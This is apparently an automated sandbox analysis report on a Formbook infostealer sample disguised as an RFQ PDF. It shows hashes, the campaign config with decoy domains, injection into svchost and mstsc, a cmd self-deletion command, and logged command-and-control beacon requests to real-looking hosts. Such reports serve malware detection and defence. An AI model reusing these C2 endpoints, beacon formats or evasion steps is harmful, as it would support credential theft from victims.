Overview

overview

10

Static

static

5

RFQ PC25-1...DF.exe

windows7-x64

10

RFQ PC25-1...DF.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/01/2025, 11:47 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RFQ PC25-1301 Product Specifications_PDF.exe

  • Size

    1.7MB

  • MD5

    01b5875dce3957e3aa4a407551e2c4ba

  • SHA1

    96e0fb3b858c9f28445955b8cee19e698d44f815

  • SHA256

    fe242ebf2305cc96041ef027f7cdad6efe3ba1cf3aab07bb37357359452205d4

  • SHA512

    c00aa40db746e6074d0bbad6c14dc840b32e53c12a484405c7b95912bcf056eb47b3fc7b110beb57d1a8e6c9f90e480a55a7be930d2ca2caf03fec6f31e06f7f

  • SSDEEP

    24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8at6FWvjTrmY44PhUY1sooWNf/w:sTvC/MTQYxsWR7aYFWvjTax4Jve

Score
10/10
formbookhwu6discoveryratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

hwu6

Decoy

lf758.vip

locerin-hair.shop

vytech.net

pet-insurance-intl-7990489.live

thepolithat.buzz

d66dr114gl.bond

suv-deals-49508.bond

job-offer-53922.bond

drstone1.click

lebahsemesta57.click

olmanihousel.shop

piedmontcsb.info

trisula888x.top

66sodovna.net

dental-implants-83810.bond

imxtld.club

frozenpines.net

ffgzgbl.xyz

tlc7z.rest

alexismuller.design

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Formbook family
    formbook
  • Formbook payload 3 IoCs
    rat
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3524
    • C:\Users\Admin\AppData\Local\Temp\RFQ PC25-1301 Product Specifications_PDF.exe
      "C:\Users\Admin\AppData\Local\Temp\RFQ PC25-1301 Product Specifications_PDF.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Users\Admin\AppData\Local\Temp\RFQ PC25-1301 Product Specifications_PDF.exe"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        PID:1732
    • C:\Windows\SysWOW64\mstsc.exe
      "C:\Windows\SysWOW64\mstsc.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4360
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Windows\SysWOW64\svchost.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:944

Network

  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    75.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    75.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    7.98.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    7.98.22.2.in-addr.arpa
    IN PTR
    Response
    7.98.22.2.in-addr.arpa
    IN PTR
    a2-22-98-7deploystaticakamaitechnologiescom
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    166.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    166.190.18.2.in-addr.arpa
    IN PTR
    Response
    166.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-166deploystaticakamaitechnologiescom
  • flag-us
    DNS
    www.edmaker.online
    Remote address:
    8.8.8.8:53
    Request
    www.edmaker.online
    IN A
    Response
  • flag-us
    DNS
    www.wdgb20.top
    Remote address:
    8.8.8.8:53
    Request
    www.wdgb20.top
    IN A
    Response
    www.wdgb20.top
    IN CNAME
    wdgb20.top
    wdgb20.top
    IN A
    206.119.82.147
  • flag-hk
    GET
    http://www.wdgb20.top/hwu6/?FFQLr=Juzs5jjw5zQ9yPWu+ultl5VN84/fIwTmHqqd6b7WcfsFF4kHAenD2xSzHi43vLLQbEsR&oHU=q2JpLLPP00YLwZhP
    Explorer.EXE
    Remote address:
    206.119.82.147:80
    Request
    GET /hwu6/?FFQLr=Juzs5jjw5zQ9yPWu+ultl5VN84/fIwTmHqqd6b7WcfsFF4kHAenD2xSzHi43vLLQbEsR&oHU=q2JpLLPP00YLwZhP HTTP/1.1
    Host: www.wdgb20.top
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 16 Jan 2025 11:48:09 GMT
    Content-Type: text/html
    Content-Length: 138
    Connection: close
    ETag: "66ad3670-8a"
  • flag-us
    DNS
    147.82.119.206.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    147.82.119.206.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.rider.vision
    Remote address:
    8.8.8.8:53
    Request
    www.rider.vision
    IN A
    Response
  • flag-us
    DNS
    22.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.suarahati7.xyz
    Remote address:
    8.8.8.8:53
    Request
    www.suarahati7.xyz
    IN A
    Response
    www.suarahati7.xyz
    IN CNAME
    suarahati7.xyz
    suarahati7.xyz
    IN A
    198.252.106.191
  • flag-us
    GET
    http://www.suarahati7.xyz/hwu6/?FFQLr=Qk0i62cYZSUeitg0PxaSe85Uei2U0QFCz/09hMQ/r6oZla20CoFuPY3uWPcJQbT0Hyju&oHU=q2JpLLPP00YLwZhP
    Explorer.EXE
    Remote address:
    198.252.106.191:80
    Request
    GET /hwu6/?FFQLr=Qk0i62cYZSUeitg0PxaSe85Uei2U0QFCz/09hMQ/r6oZla20CoFuPY3uWPcJQbT0Hyju&oHU=q2JpLLPP00YLwZhP HTTP/1.1
    Host: www.suarahati7.xyz
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 796
    date: Thu, 16 Jan 2025 11:48:50 GMT
    server: LiteSpeed
  • flag-us
    DNS
    191.106.252.198.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    191.106.252.198.in-addr.arpa
    IN PTR
    Response
    191.106.252.198.in-addr.arpa
    IN PTR
    191106252198staticreverse arandomservercom
  • flag-us
    DNS
    www.66sodovna.net
    Remote address:
    8.8.8.8:53
    Request
    www.66sodovna.net
    IN A
    Response
    www.66sodovna.net
    IN A
    104.21.69.218
    www.66sodovna.net
    IN A
    172.67.213.128
  • flag-us
    GET
    http://www.66sodovna.net/hwu6/?oHU=q2JpLLPP00YLwZhP&FFQLr=iK23zTJnZxVBDsLzl0iPxrR9FiwOomAN6WSu7UOM3K3trLqJjngnKn+rys81GkWhjVYZ
    Explorer.EXE
    Remote address:
    104.21.69.218:80
    Request
    GET /hwu6/?oHU=q2JpLLPP00YLwZhP&FFQLr=iK23zTJnZxVBDsLzl0iPxrR9FiwOomAN6WSu7UOM3K3trLqJjngnKn+rys81GkWhjVYZ HTTP/1.1
    Host: www.66sodovna.net
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 16 Jan 2025 11:49:08 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    x-turbo-charged-by: LiteSpeed
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ErgL4HT0TD%2BAdJ1DWYBDKeRcIYG1%2Fb3qBlfuMM4jVdKDv8%2FsWit5aVx45QfJEU0%2FXt2xuL%2F%2F6tTci%2FG6UCzN8c%2BwHrJAFM2zX4ouNi7m1yCKnQ0BjYouqcgz78TDdLpmYgIHuw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 902de167ce7c60f6-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=47514&min_rtt=47514&rtt_var=23757&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=170&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • flag-us
    DNS
    218.69.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    218.69.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    3.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    3.173.189.20.in-addr.arpa
    IN PTR
    Response
  • 206.119.82.147:80
    http://www.wdgb20.top/hwu6/?FFQLr=Juzs5jjw5zQ9yPWu+ultl5VN84/fIwTmHqqd6b7WcfsFF4kHAenD2xSzHi43vLLQbEsR&oHU=q2JpLLPP00YLwZhP
    http
    Explorer.EXE
    397 B
     474 B
     5
    4

    HTTP Request

    GET http://www.wdgb20.top/hwu6/?FFQLr=Juzs5jjw5zQ9yPWu+ultl5VN84/fIwTmHqqd6b7WcfsFF4kHAenD2xSzHi43vLLQbEsR&oHU=q2JpLLPP00YLwZhP

    HTTP Response

    404
  • 198.252.106.191:80
    http://www.suarahati7.xyz/hwu6/?FFQLr=Qk0i62cYZSUeitg0PxaSe85Uei2U0QFCz/09hMQ/r6oZla20CoFuPY3uWPcJQbT0Hyju&oHU=q2JpLLPP00YLwZhP
    http
    Explorer.EXE
    401 B
     1.2kB
     5
    5

    HTTP Request

    GET http://www.suarahati7.xyz/hwu6/?FFQLr=Qk0i62cYZSUeitg0PxaSe85Uei2U0QFCz/09hMQ/r6oZla20CoFuPY3uWPcJQbT0Hyju&oHU=q2JpLLPP00YLwZhP

    HTTP Response

    404
  • 104.21.69.218:80
    http://www.66sodovna.net/hwu6/?oHU=q2JpLLPP00YLwZhP&FFQLr=iK23zTJnZxVBDsLzl0iPxrR9FiwOomAN6WSu7UOM3K3trLqJjngnKn+rys81GkWhjVYZ
    http
    Explorer.EXE
    538 B
     2.0kB
     8
    7

    HTTP Request

    GET http://www.66sodovna.net/hwu6/?oHU=q2JpLLPP00YLwZhP&FFQLr=iK23zTJnZxVBDsLzl0iPxrR9FiwOomAN6WSu7UOM3K3trLqJjngnKn+rys81GkWhjVYZ

    HTTP Response

    404
  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    75.159.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    75.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    7.98.22.2.in-addr.arpa
    dns
    68 B
     129 B
     1
    1

    DNS Request

    7.98.22.2.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    142 B
     157 B
     2
    1

    DNS Request

    13.86.106.20.in-addr.arpa

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    166.190.18.2.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    166.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    www.edmaker.online
    dns
    64 B
     129 B
     1
    1

    DNS Request

    www.edmaker.online

  • 8.8.8.8:53
    www.wdgb20.top
    dns
    60 B
     90 B
     1
    1

    DNS Request

    www.wdgb20.top

    DNS Response

    206.119.82.147

  • 8.8.8.8:53
    147.82.119.206.in-addr.arpa
    dns
    73 B
     131 B
     1
    1

    DNS Request

    147.82.119.206.in-addr.arpa

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
     147 B
     1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    www.rider.vision
    dns
    62 B
     130 B
     1
    1

    DNS Request

    www.rider.vision

  • 8.8.8.8:53
    22.49.80.91.in-addr.arpa
    dns
    70 B
     145 B
     1
    1

    DNS Request

    22.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    www.suarahati7.xyz
    dns
    64 B
     94 B
     1
    1

    DNS Request

    www.suarahati7.xyz

    DNS Response

    198.252.106.191

  • 8.8.8.8:53
    191.106.252.198.in-addr.arpa
    dns
    74 B
     136 B
     1
    1

    DNS Request

    191.106.252.198.in-addr.arpa

  • 8.8.8.8:53
    www.66sodovna.net
    dns
    63 B
     95 B
     1
    1

    DNS Request

    www.66sodovna.net

    DNS Response

    104.21.69.218
    172.67.213.128

  • 8.8.8.8:53
    218.69.21.104.in-addr.arpa
    dns
    72 B
     134 B
     1
    1

    DNS Request

    218.69.21.104.in-addr.arpa

  • 8.8.8.8:53
    3.173.189.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    3.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1476-2-0x0000000000D00000-0x0000000001100000-memory.dmp

    Filesize

    4.0MB

    Download

  • memory/1732-6-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/1732-3-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/1732-4-0x0000000001300000-0x000000000164A000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1732-7-0x0000000001650000-0x0000000001664000-memory.dmp

    Filesize

    80KB

    Download

  • memory/3524-13-0x000000000AB30000-0x000000000AC6D000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/3524-8-0x000000000AB30000-0x000000000AC6D000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/3524-17-0x0000000008D90000-0x0000000008F04000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/3524-18-0x0000000008D90000-0x0000000008F04000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/3524-20-0x0000000008D90000-0x0000000008F04000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/4360-9-0x00000000003A0000-0x00000000004DA000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/4360-11-0x00000000003A0000-0x00000000004DA000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/4360-12-0x0000000000800000-0x000000000082F000-memory.dmp

    Filesize

    188KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.